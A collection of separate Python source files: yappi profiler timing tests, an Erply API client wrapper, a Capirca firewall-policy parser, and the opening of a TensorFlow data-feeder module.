a()
else:
b()
def b():
if self._ncall == 3:
return
else:
c()
def c():
if self._ncall == 2:
self._ncall += 1
c()
else:
b()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
cfsaa = fsa.children[fsa.index]
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc.full_name]
cfscc = fsc.children[fsc]
cfscb = fsc.children[fsb]
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 5)
self.assertEqual(cfsbc.ttot , 5)
self.assertEqual(cfsbc.tsub , 2)
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 4)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsaa.ttot , 11)
self.assertEqual(cfsaa.tsub , 2)
self.assertEqual(fsc.ttot , 5)
self.assertEqual(fsc.tsub , 4)
def test_abaa(self):
_timings = {"a_1":13,"b_1":10,"a_2":9,"a_3":5}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
elif self._ncall == 2:
self._ncall += 1
a()
else:
return
def b():
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsba = fsb.children[fsa]
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 1)
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 12)
self.assertEqual(cfsaa.ttot , 5)
self.assertEqual(cfsaa.tsub , 5)
self.assertEqual(cfsba.ttot , 9)
self.assertEqual(cfsba.tsub , 4)
def test_aabb(self):
_timings = {"a_1":13,"a_2":10,"b_1":9,"b_2":5}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
self._ncall += 1
a()
elif self._ncall == 2:
b()
else:
return
def b():
if self._ncall == 2:
self._ncall += 1
b()
else:
return
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsab = fsa.children[fsb]
cfsbb = fsb.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 4)
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 9)
self.assertEqual(cfsaa.ttot , 10)
self.assertEqual(cfsaa.tsub , 1)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbb.ttot , 5)
self.assertEqual(cfsbb.tsub , 5)
def test_abbb(self):
_timings = {"a_1":13,"b_1":10,"b_2":6,"b_3":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
def b():
if self._ncall == 3:
return
self._ncall += 1
b()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsab = fsa.children[fsb]
cfsbb = fsb.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 3)
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 10)
self.assertEqual(fsb.ncall , 3)
self.assertEqual(fsb.nactualcall , 1)
self.assertEqual(cfsab.ttot , 10)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbb.ttot , 6)
self.assertEqual(cfsbb.tsub , 6)
self.assertEqual(cfsbb.nactualcall , 0)
self.assertEqual(cfsbb.ncall , 2)
def test_aaab(self):
_timings = {"a_1":13,"a_2":10,"a_3":6,"b_1":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 3:
b()
return
self._ncall += 1
a()
def b():
return
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsab = fsa.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 12)
self.assertEqual(fsb.ttot , 1)
self.assertEqual(fsb.tsub , 1)
self.assertEqual(cfsaa.ttot , 10)
self.assertEqual(cfsaa.tsub , 9)
self.assertEqual(cfsab.ttot , 1)
self.assertEqual(cfsab.tsub , 1)
def test_abab(self):
_timings = {"a_1":13,"b_1":10,"a_2":6,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
b()
def b():
if self._ncall == 2:
return
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsab = fsa.children[fsb]
cfsba = fsb.children[fsa]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 8)
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 5)
self.assertEqual(cfsab.ttot , 10)
self.assertEqual(cfsab.tsub , 5)
self.assertEqual(cfsab.ncall , 2)
self.assertEqual(cfsab.nactualcall , 1)
self.assertEqual(cfsba.ttot , 6)
self.assertEqual(cfsba.tsub , 5)
|
|
# -*- coding: utf-8 -*-
"""
erply
~~~~~
Simple Python wrapper for Erply API
:copyright: (c) 2014-2016 by Priit Laes
:license: BSD, see LICENSE for details.
"""
from contextlib import closing
from datetime import datetime
from time import sleep
import csv
import requests
class ErplyException(Exception):
pass
class ErplyAPILimitException(ErplyException):
"""Raised when Erply API limit (by default 1000 requests per hour) has
been exceeded.
:param server_time: Erply server time. Can be used to determine amount of
time until API accepts requests again.
"""
def __init__(self, server_time):
self.server_time = server_time
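# ---------------------------------------------------------------------------
# Handling sketch (illustrative, not part of the module): with wait_on_limit
# left at False, a caller can catch this exception and back off until the
# hourly quota resets, mirroring the sleep that Erply._parse_response
# performs internally when wait_on_limit is True.
#
#     try:
#         products = erply.getProducts()
#     except ErplyAPILimitException as e:
#         # the request quota resets at the top of the hour after server_time
#         sleep(60 * (60 - e.server_time.minute) + 1)
# ---------------------------------------------------------------------------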
class ErplyPermissionException(Exception):
"""No viewing rights for this item."""
class ErplyAuth(object):
def __init__(self, code, username, password):
self.code = code
self.username = username
self.password = password
@property
def data(self):
return {'username': self.username,
'password': self.password}
class Erply(object):
ERPLY_GET = (
# TODO: This list is still incomplete
'getAddresses'
,'getAddressTypes'
,'getCustomers'
,'getCustomerGroups'
# ,'getDocuments' Unimplemented from ERPLY side :(
,'getEmployees'
,'getProducts'
,'getProductCategories'
,'getProductCostForSpecificAmount' # untested
,'getProductGroups'
,'getProductPrices' # untested, broken ??
,'getProductPriorityGroups' # untested
,'getProductStock' # untested
,'getProductUnits'
,'getPurchaseDocuments'
,'getReports'
,'getSalesDocuments'
,'getServices'
,'getWarehouses'
,'verifyUser'
)
ERPLY_CSV = ('getProductStockCSV', 'getSalesReport')
ERPLY_POST = ('saveProduct',)
def __init__(self, auth, erply_api_url=None, wait_on_limit=False):
self.auth = auth
self._key = None
# Whether to wait for next hour when API limit has been met.
# When False, ErplyAPILimitException will be raised, otherwise
# request will be retried when new hour starts.
self.wait_on_limit = wait_on_limit
# User-specified Erply API url
self.erply_api_url = erply_api_url
@property
def _payload(self):
return {'clientCode': self.auth.code}
@property
def session(self):
def authenticate():
response = self.verifyUser(**self.auth.data)
            if response.error:
                raise ValueError(
                    'Authentication failed with code {}'.format(response.error))
key = response.fetchone().get('sessionKey', None)
self._key = key
return key
return self._key if self._key else authenticate()
@property
def payload(self):
return dict(sessionKey=self.session, **self._payload)
@property
def api_url(self):
return self.erply_api_url or \
'https://{}.erply.com/api/'.format(self.auth.code)
@property
def headers(self):
        return {'Content-Type': 'application/x-www-form-urlencoded'}
def _parse_response(self, resp, _initial_response=None):
"""Parse API response.
Returns two-tuple containing: `retry` and `data` values:
- `retry` is boolean specifying whether session token was expired
and signalling caller to request new session token and redo the
API with original parameters.
- `data` - dictionary of original json-encoded response.
"""
if resp.status_code != requests.codes.ok:
raise ValueError('Request failed with error {}'.format(resp.status_code))
data = resp.json()
status = data.get('status', {})
if not status:
raise ValueError('Malformed response')
error = status.get('errorCode')
if error == 0:
return False, data
elif error == 1002:
server_time = datetime.fromtimestamp(status.get('requestUnixTime'))
if not self.wait_on_limit:
raise ErplyAPILimitException(server_time)
# Calculate time to sleep until next hour
sleep((60 * (60 - server_time.minute)) + 1)
return True, None
elif error == 1054:
self._key = None
return True, None
elif error == 1060:
# No viewing rights for this item
raise ErplyPermissionException()
field = status.get('errorField')
if field:
raise ErplyException('Erply error: {}, field: {}'.format(error, field))
raise ErplyException('Erply error: {}'.format(error))
def handle_csv(self, request, *args, **kwargs):
data = dict(request=request.replace('CSV', ''), responseType='CSV')
data.update(self.payload)
data.update(**kwargs)
r = requests.post(self.api_url, data=data, headers=self.headers)
retry, parsed_data = self._parse_response(r)
if retry:
return getattr(self, request)(*args, **kwargs)
return ErplyCSVResponse(self, parsed_data)
def handle_get(self, request, _page=None, _response=None, *args, **kwargs):
_is_bulk = kwargs.pop('_is_bulk', False)
data = kwargs.copy()
if _page:
data['pageNo'] = _page + 1
if _is_bulk:
data.update(requestName=request)
return data
data.update(request=request)
data.update(self.payload if request != 'verifyUser' else self._payload)
r = requests.post(self.api_url, data=data, headers=self.headers)
retry, parsed_data = self._parse_response(r)
# Retry request in case of token expiration
if retry:
return getattr(self, request)(_page=_page, _response=_response, *args, **kwargs)
if _response:
_response.populate_page(parsed_data.get('records'), _page)
return ErplyResponse(self, parsed_data, request, _page, *args, **kwargs)
def handle_post(self, request, *args, **kwargs):
_is_bulk = kwargs.pop('_is_bulk', False)
data = kwargs.copy()
if _is_bulk:
data.update(requestName=request)
return data
data.update(request=request)
data.update(self.payload)
r = requests.post(self.api_url, data=data, headers=self.headers)
retry, parsed_data = self._parse_response(r)
        # Retry the request in case of token expiration
        if retry:
            return getattr(self, request)(*args, **kwargs)
return ErplyResponse(self, parsed_data, request, *args, **kwargs)
def handle_bulk(self, _requests):
data = self.payload
data.update(requests=_requests)
return ErplyBulkResponse(self, requests.post(self.api_url, data=data))
def __getattr__(self, attr):
_attr = None
_is_bulk = len(attr) > 5 and attr.endswith('_bulk')
if _is_bulk:
attr = attr[:-5]
if attr in self.ERPLY_GET:
def method(*args, **kwargs):
_page = kwargs.pop('_page', 0)
_response = kwargs.pop('_response', None)
return self.handle_get(attr, _page, _response, _is_bulk=_is_bulk, *args, **kwargs)
_attr = method
elif attr in self.ERPLY_POST:
def method(*args, **kwargs):
return self.handle_post(attr, _is_bulk=_is_bulk, *args, **kwargs)
_attr = method
elif attr in self.ERPLY_CSV:
def method(*args, **kwargs):
return self.handle_csv(attr, *args, **kwargs)
_attr = method
        if _attr:
            # Cache under the name that was actually requested, so the bulk
            # variant does not shadow the plain method (attr was stripped of
            # its '_bulk' suffix above).
            name = '{}_bulk'.format(attr) if _is_bulk else attr
            self.__dict__[name] = _attr
            return _attr
        raise AttributeError(attr)
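# ---------------------------------------------------------------------------
# Usage sketch (illustrative; 'CLIENT_CODE', 'user' and 'secret' are
# placeholder credentials):
#
#     auth = ErplyAuth('CLIENT_CODE', 'user', 'secret')
#     erply = Erply(auth, wait_on_limit=True)
#     products = erply.getProducts(recordsOnPage=100)
#     print(products.total)        # total record count reported by Erply
#     for record in products[0]:   # page 0; later pages are fetched lazily
#         print(record)
# ---------------------------------------------------------------------------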
class ErplyBulkRequest(object):
def __init__(self, erply, _json_dumps):
self.calls = []
self.erply = erply
self.json_dumper = _json_dumps
def attach(self, attr, *args, **kwargs):
if attr in self.erply.ERPLY_GET or attr in self.erply.ERPLY_POST:
self.calls.append((getattr(self.erply, '{}_bulk'.format(attr)), args, kwargs))
def __call__(self,):
_requests = []
for n, request in enumerate(self.calls, start=1):
_call, _args, _kwargs = request
_kwargs.update(requestID=n)
_requests.append(_call(*_args, **_kwargs))
return self.erply.handle_bulk(self.json_dumper(_requests))
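# ---------------------------------------------------------------------------
# Usage sketch (illustrative; json.dumps is one possible dumper to pass in):
#
#     import json
#     bulk = ErplyBulkRequest(erply, json.dumps)
#     bulk.attach('getProducts', recordsOnPage=100)
#     bulk.attach('getWarehouses')
#     for records in bulk().records:
#         print(records)
# ---------------------------------------------------------------------------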
class ErplyResponse(object):
def __init__(self, erply, data, request, page=0, *args, **kwargs):
self.request = request
self.erply = erply
self.error = None
# Result pagination setup
self.page = page
self.per_page = kwargs.get('recordsOnPage', 20)
self.kwargs = kwargs
status = data.get('status', {})
self.total = status.get('recordsTotal')
self.records = { page: data.get('records')}
    def fetchone(self):
        if self.total == 1:
            return self.records[self.page][0]
        raise ValueError(
            'fetchone() expects exactly one record, got {}'.format(self.total))
def fetch_records(self, page):
self.erply.handle_get(self.request, _page=page, _response=self, **self.kwargs)
def populate_page(self, data, page):
assert self.per_page != 0
self.records[page] = data
def __getitem__(self, key):
if isinstance(key, slice):
raise NotImplementedError
if self.per_page * key >= self.total:
raise IndexError
if key not in self.records:
self.fetch_records(key)
return self.records[key]
class ErplyCSVResponse(object):
def __init__(self, erply, data):
self.erply = erply
status = data.get('status', {})
self.url = data.get('records').pop().get('reportLink')
self.timestamp = datetime.fromtimestamp(status.get('requestUnixTime'))
@property
def records(self):
with closing(requests.get(self.url, stream=True)) as f:
if f.status_code != requests.codes.ok:
raise ValueError
# XXX: Check whether we have to make it configurable...
# XXX: Should we remove header and footer?
return csv.reader(f.text.splitlines(), delimiter=';')
class ErplyBulkResponse(object):
def __init__(self, erply, response):
        if response.status_code != requests.codes.ok:
            raise ValueError('Request failed with error code '
                             '{}'.format(response.status_code))
        self.data = response.json()
        status = self.data.get('status', {})
        if not status:
            raise ValueError('Malformed response')
self.error = status.get('errorCode')
self._requests = self.data.get('requests')
@property
def records(self):
if self._requests is None:
raise ValueError
for el in self._requests:
_status = el.get('status')
if _status.get('responseStatus') == 'error':
                print('Request failed: requestID: {} errorField: {}'.format(
_status.get('requestID'),
_status.get('errorField'),
))
else:
yield el.get('records')
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple, line-oriented parser for Caprica policies.
This parser differs from the default parser in that it preserves the original
structure and defers resolving referents to the user. This is useful for
analyzing policy structures and their use of naming data. It happens to discard
inline comments but preserves line-level comments. Fields expected to have
"naming" values are stored as a set without order or line breaks retained.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
class Field(object):
"""A name-value assignment within a block."""
def __init__(self, value):
self.value = value
def __str__(self):
t = type(self)
f = 'UNKNOWN'
    for k, v in field_map.items():
if t == v:
f = k
break
indent = len(f) + 5
return '%s::%s' % (f, self.ValueStr().replace('\n', '\n' + ' ' * indent))
def __eq__(self, o):
if type(self) != type(o):
return False
return self.value == o.value
def __ne__(self, o):
return not self == o
def Append(self, value):
self.value += value
def ValueStr(self):
return self.value
class IntegerField(Field):
def __init__(self, value):
super(IntegerField, self).__init__(value)
try:
_ = int(value)
except ValueError:
raise ValueError('Invalid integer field: "%s"' % str(self))
class NamingField(Field):
"""A naming field is one that refers to names in used in naming.py."""
def __init__(self, value):
super(NamingField, self).__init__(value)
self.value = self.ParseString(value)
def ParseString(self, value):
"""Split and validate a string value into individual names."""
parts = set(value.split())
for p in parts:
self.ValidatePart(p)
return parts
def ValidatePart(self, part):
"""Validate that a string smells like a naming.py name."""
for c in part:
if c not in '-_.' and not c.isdigit() and not c.isupper():
        raise ValueError('Invalid name reference: "%s"' % part)
def Append(self, value):
"""Split, validate, and add name contained within a string."""
parts = self.ParseString(value)
self.value.update(parts)
def ValueStr(self):
"""Return the value as a series of lines no longer than 60 chars each."""
values = sorted(self.value)
line_wrap = 60
length = 0
line_buf = []
value_buf = []
for v in values:
if length + len(v) > line_wrap:
value_buf.append(' '.join(line_buf))
length = 0
line_buf = []
else:
if line_buf:
length += 1
line_buf.append(v)
length += len(v)
if line_buf:
value_buf.append(' '.join(line_buf))
return ' ' + '\n'.join(value_buf)
class Action(Field):
"""An action field."""
class Address(NamingField):
"""An address field."""
class Port(NamingField):
"""A port field."""
class Comment(Field):
"""A comment field."""
def ValueStr(self):
# Comments should align with the string contents, after the leading
# quotation mark.
return self.value.replace('\n', '\n ')
class Counter(Field):
"""A counter field."""
class DestinationAddress(Address):
"""A destination-address field."""
class DestinationExclude(Address):
"""A destination-exclude field."""
class DestinationInterface(Field):
"""A destination-interface field."""
class DestinationPort(Port):
"""A destination-port field."""
class DestinationPrefix(Field):
"""A destination-prefix field."""
class DestinationPrefixExcept(Field):
"""A destination-prefix-except field."""
class DestinationTag(Field):
"""A destination tag field."""
class DscpMatch(Field):
"""A dscp-match field."""
class DscpSet(Field):
"""A dscp-set field."""
class EtherType(Field):
"""An ether-type field."""
class Expiration(Field):
"""An expiration field."""
class FragmentOffset(Field):
"""A fragment-offset field."""
class ForwardingClass(Field):
"""A forwarding-class field."""
class ForwardingClassExcept(Field):
"""A forwarding-class-except field."""
class IcmpCode(Field):
"""A icmp-code field."""
class IcmpType(Field):
"""A icmp-type field."""
class Logging(Field):
"""A logging field."""
class LossPriority(Field):
"""A loss-priority field."""
class Option(Field):
"""An Option field."""
class Owner(Field):
"""An owner field."""
class NextIP(Field):
"""An owner field."""
class PacketLength(Field):
"""A packet-length field."""
class Platform(Field):
"""A platform field."""
class PlatformExclude(Field):
"""A platform-exclude field."""
class Policer(Field):
"""A rate-limit-icmp field."""
class Precedence(Field):
"""A precedence field."""
class Principals(Field):
"""A principals field."""
class Protocol(Field):
"""A Protocol field."""
class ProtocolExcept(Field):
"""A protocol-except field."""
class Qos(Field):
"""A rate-limit-icmp field."""
class PANApplication(Field):
"""A rate-limit-icmp field."""
class RoutingInstance(Field):
"""A routing-instance field."""
class SourceAddress(Address):
"""A source-address field."""
class SourceExclude(Address):
"""A source-exclude field."""
class SourceInterface(Field):
"""A source-interface field."""
class SourcePort(Port):
"""A source-port field."""
class SourcePrefix(Field):
"""A source-prefix field."""
class SourcePrefixExcept(Field):
"""A source-prefix-except field."""
class SourceTag(Field):
"""A source tag field."""
class Target(Field):
"""A target field."""
class Timeout(IntegerField):
"""A timeout field."""
class TrafficType(Field):
"""A traffic-type field."""
class TrafficClassCount(Field):
"""A traffic-class-count field."""
class Verbatim(Field):
"""A verbatim field."""
class Vpn(Field):
"""A vpn field."""
destination_address_fields = (DestinationAddress, DestinationExclude,
DestinationPrefix)
field_map = {
'action': Action,
'address': Address,
'comment': Comment,
'counter': Counter,
'destination-address': DestinationAddress,
'destination-exclude': DestinationExclude,
'destination-interface': DestinationInterface,
'destination-port': DestinationPort,
'destination-prefix': DestinationPrefix,
'destination-prefix-except': DestinationPrefixExcept,
'destination-tag': DestinationTag,
'dscp-match': DscpMatch,
'dscp-set': DscpSet,
'ether-type': EtherType,
'expiration': Expiration,
'fragment-offset': FragmentOffset,
'forwarding-class': ForwardingClass,
'forwarding-class-except': ForwardingClassExcept,
'icmp-code': IcmpCode,
'icmp-type': IcmpType,
'logging': Logging,
'loss-priority': LossPriority,
'option': Option,
'owner': Owner,
'next-ip': NextIP,
'packet-length': PacketLength,
'platform': Platform,
'platform-exclude': PlatformExclude,
'policer': Policer,
'port': Port,
'precedence': Precedence,
'principals': Principals,
'protocol': Protocol,
'protocol-except': ProtocolExcept,
'qos': Qos,
'pan-application': PANApplication,
'routing-instance': RoutingInstance,
'source-address': SourceAddress,
'source-exclude': SourceExclude,
'source-interface': SourceInterface,
'source-port': SourcePort,
'source-prefix': SourcePrefix,
'source-prefix-except': SourcePrefixExcept,
'source-tag': SourceTag,
'target': Target,
'timeout': Timeout,
'traffic-class-count': TrafficClassCount,
'traffic-type': TrafficType,
'verbatim': Verbatim,
'vpn': Vpn,
}
class Block(object):
"""A section containing fields."""
def __init__(self):
self.fields = []
def __iter__(self):
return iter(self.fields)
def __getitem__(self, i):
return self.fields[i]
def __str__(self):
buf = []
buf.append(type(self).__name__.lower())
buf.append(' ')
if self.Name():
buf.append(self.Name())
buf.append(' ')
buf.append('{') # }
buf.append('\n')
for field in self.fields:
buf.append(' ')
buf.append(str(field))
buf.append('\n')
buf.append('}')
buf.append('\n')
return ''.join(buf)
def AddField(self, field):
if not issubclass(type(field), Field):
      raise TypeError('%s not subclass of Field.' % field)
self.fields.append(field)
def FieldsWithType(self, f_type):
if not issubclass(f_type, Field):
      raise TypeError('%s not subclass of Field.' % f_type)
return [x for x in self.fields if isinstance(x, f_type)]
def Match(self, match_fn):
"""Yield the fields and their indices for which match_fn is True."""
for i, f in enumerate(self.fields):
if match_fn(f):
yield i, f
def Name(self):
return ''
def __eq__(self, o):
if type(self) != type(o):
return False
if len(self.fields) != len(o.fields):
return False
for mine, theirs in zip(self.fields, o.fields):
logging.debug('testing "%s" vs "%s"', mine, theirs)
if mine != theirs:
return False
return True
def __ne__(self, o):
return not self == o
class Header(Block):
"""A header block."""
class Term(Block):
"""A policy term."""
def __init__(self, name):
super(Term, self).__init__()
self.name = name
def Name(self):
return self.name
def __eq__(self, o):
if not super(Term, self).__eq__(o):
return False
return self.name == o.name
def Describe(self):
"""Return a human-readable description of the term."""
verbatims = self.FieldsWithType(Verbatim)
if verbatims:
return 'Verbatim: %s' % verbatims
handled = set()
handled.update(self.FieldsWithType(Comment))
pieces = []
actions = self.FieldsWithType(Action)
if len(actions) != 1:
raise ValueError('No action or multiple actions.')
handled.update(actions)
pieces.append(actions[0].value.title() + ' traffic')
protocols = self.FieldsWithType(Protocol)
all_protocols = set()
if protocols:
handled.update(protocols)
for protocol in protocols:
all_protocols.update(protocol.value.split())
pieces.append('using ' + ' or '.join(sorted(all_protocols)))
icmp_code = self.FieldsWithType(IcmpCode)
all_icmp_code = set()
if icmp_code:
handled.update(icmp_code)
for code in icmp_code:
all_icmp_code.update(code.value.split())
pieces.append('(ICMP code %s)' % ', '.join(sorted(all_icmp_code)))
icmp_types = self.FieldsWithType(IcmpType)
all_icmp_types = set()
if icmp_types:
handled.update(icmp_types)
for icmp_type in icmp_types:
all_icmp_types.update(icmp_type.value.split())
pieces.append('(ICMP types %s)' % ', '.join(sorted(all_icmp_types)))
sources = self.FieldsWithType(SourceAddress)
if sources:
handled.update(sources)
pieces.append('originating from')
all_sources = set()
for source in sources:
all_sources.update(source.value)
pieces.append(', '.join(sorted(all_sources)))
source_ports = self.FieldsWithType(SourcePort)
if source_ports:
handled.update(source_ports)
if sources:
pieces.append('using port')
else:
pieces.append('originating port')
all_sources = set()
for source in source_ports:
all_sources.update(source.value)
pieces.append(', '.join(sorted(all_sources)))
destinations = self.FieldsWithType(DestinationAddress)
if destinations:
handled.update(destinations)
pieces.append('destined for')
all_destinations = set()
for destination in destinations:
all_destinations.update(destination.value)
pieces.append(', '.join(sorted(all_destinations)))
destination_ports = self.FieldsWithType(DestinationPort)
if destination_ports:
handled.update(destination_ports)
if destinations:
pieces.append('on port')
else:
pieces.append('destined for port')
all_destinations = set()
for destination in destination_ports:
all_destinations.update(destination.value)
pieces.append(', '.join(sorted(all_destinations)))
vpns = self.FieldsWithType(Vpn)
if vpns:
handled.update(vpns)
pieces.append('via VPNs')
pieces.append(','.join(x.value for x in vpns))
# Ignore some fields
for ignored_type in (Expiration, Owner):
ignored_fields = self.FieldsWithType(ignored_type)
if ignored_fields:
handled.update(ignored_fields)
for field in self:
if field not in handled:
raise ValueError('Uncovered field: ' + str(field))
return ' '.join(pieces)
class BlankLine(object):
"""A blank line."""
def __str__(self):
return '\n'
def __eq__(self, o):
return type(o) == BlankLine
def __ne__(self, o):
return not self == o
class CommentLine(object):
"""A comment in the file."""
def __init__(self, data):
self.data = data
def __str__(self):
return str(self.data) + '\n'
def __eq__(self, o):
if type(o) != CommentLine:
return False
return self.data == o.data
def __ne__(self, o):
return not self == o
class Include(object):
"""A reference to another policy definition."""
def __init__(self, identifier):
self.identifier = identifier
def __str__(self):
return '#include %s' % self.identifier
def __eq__(self, o):
if type(o) != Include:
return False
return self.identifier == o.identifier
def __ne__(self, o):
return not self == o
class Policy(object):
"""An ordered list of headers, terms, comments, blank lines and includes."""
def __init__(self, identifier):
self.identifier = identifier
self.members = []
def AddMember(self, member):
m_type = type(member)
if (m_type not in (Include, CommentLine, BlankLine)
and not issubclass(m_type, Block)):
raise TypeError('%s must be a Block, CommentLine, BlankLine,'
' or Include' % m_type)
self.members.append(member)
def __str__(self):
return ''.join(str(x) for x in self.members)
def __iter__(self):
return iter(self.members)
def __getitem__(self, i):
return self.members[i]
def Match(self, match_fn):
"""Yield the members and their indices for which match_fn is True."""
for i, m in enumerate(self.members):
if match_fn(m):
yield i, m
def MatchFields(self, block_match_fn, field_match_fn):
for match_idx, m in self.Match(block_match_fn):
if not isinstance(m, Block):
continue
for field_idx, f in m.Match(field_match_fn):
yield match_idx, field_idx, f
class PolicyParser(object):
"""Parse a policy object from a data buffer."""
def __init__(self, data, identifier):
self.data = data
self.identifier = identifier
self.block_in_progress = None
self.policy = None
def Parse(self):
"""Do the needful."""
self.policy = Policy(self.identifier)
for line in self.data.split('\n'):
line = line.strip()
logging.debug('Processing line: "%s"', line)
if self.block_in_progress:
self.ParseInBlock(line)
else:
self.ParseTopLevel(line)
if self.block_in_progress:
      raise ValueError('Unexpected EOF reading "%s"' % self.block_in_progress)
return self.policy
def ParseTopLevel(self, line):
"""Parse a line not nested within a block."""
if line == '': # pylint: disable=g-explicit-bool-comparison
self.policy.AddMember(BlankLine())
return
if line.startswith('#'):
if line.startswith('#include '):
self.ParseIncludeLine(line)
return
self.ParseCommentLine(line)
return
if line.startswith('header {') or line.startswith('header{'): # }
self.ParseHeaderLine(line)
return
if line.startswith('term '):
self.ParseTermLine(line)
return
    raise ValueError('Unhandled top-level line %s' % line)
def ParseCommentLine(self, line):
"""Parse a line with a line level comment."""
if self.block_in_progress:
      raise ValueError('Found comment line in block: %s' % line)
self.policy.AddMember(CommentLine(line))
def ParseIncludeLine(self, line):
"""Parse an #include line refering to another file."""
if self.block_in_progress:
      raise ValueError('Found include line in block: %s' % line)
line_parts = line.split()
if len(line_parts) < 2:
      raise ValueError('Invalid include: %s' % line)
inc_ref = line_parts[1]
if '#' in inc_ref:
inc_ref, _ = inc_ref.split('#', 1)
self.policy.AddMember(Include(inc_ref))
def ParseHeaderLine(self, line):
"""Parse a line beginning a header block."""
if self.block_in_progress:
      raise ValueError('Nested blocks not allowed: %s' % line)
self.block_in_progress = Header()
def ParseTermLine(self, line):
"""Parse a line beginning a term block."""
if self.block_in_progress:
      raise ValueError('Nested blocks not allowed: %s' % line)
line_parts = line.split()
# Some terms don't have a space after the name
if '{' in line_parts[1]: # }
brace_idx = line_parts[1].index('{') # }
line_parts[1] = line_parts[1][:brace_idx]
else:
if not line_parts[2].startswith('{'): # }
        raise ValueError('Invalid term line: %s' % line)
term_name = line_parts[1]
self.block_in_progress = Term(term_name)
def ParseInBlock(self, line):
"""Parse a line when inside a block definition."""
if line == '' or line.startswith('#'): # pylint: disable=g-explicit-bool-comparison
return
if '::' in line:
self.ParseField(line)
return
if line.startswith('}'):
self.policy.AddMember(self.block_in_progress)
self.block_in_progress = None
return
self.block_in_progress.fields[-1].Append('\n' + line)
def ParseField(self, line):
"""Parse a line containing a block field."""
name, value = line.split('::', 1)
name = name.strip().lower()
f_type = field_map.get(name)
if not f_type:
      raise ValueError('Invalid field line: %s' % line)
self.block_in_progress.AddField(f_type(value))
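# Usage sketch (illustrative; the policy text below is hypothetical):
#
#     POLICY_TEXT = '\n'.join([
#         'term allow-dns {',
#         '  protocol:: udp',
#         '  destination-port:: DNS',
#         '  action:: accept',
#         '}',
#     ])
#     policy = PolicyParser(POLICY_TEXT, 'example.pol').Parse()
#     for _, term in policy.Match(lambda m: isinstance(m, Term)):
#         print(term.Name(), '->', term.Describe())
#     # allow-dns -> Accept traffic using udp destined for port DNS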
|
|
"""Implementations of different data feeders to provide data for TF trainer."""
# Copyright 2015-present The Scikit Flow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import math
import six
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
from tensorflow.python.ops import array_ops
from tensorflow.python.framework import dtypes
from .pandas_io import HAS_PANDAS, extract_pandas_data, extract_pandas_matrix, extract_pandas_labels
from .dask_io import HAS_DASK, extract_dask_data, extract_dask_labels
def _get_in_out_shape(x_shape, y_shape, n_classes, batch_size):
"""Returns shape for input and output of the data feeder."""
x_shape = list(x_shape[1:]) if len(x_shape) > 1 else [1]
input_shape = [batch_size] + x_shape
if y_shape is None:
return input_shape, None
y_shape = list(y_shape[1:]) if len(y_shape) > 1 else []
# Skip first dimension if it is 1.
if y_shape and y_shape[0] == 1:
y_shape = y_shape[1:]
if n_classes > 1:
output_shape = [batch_size] + y_shape + [n_classes]
else:
output_shape = [batch_size] + y_shape
return input_shape, output_shape
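# Worked example (illustrative): for X with shape (100, 5) and y with shape
# (100,), n_classes=3 and batch_size=32 yield
#     input_shape  == [32, 5]
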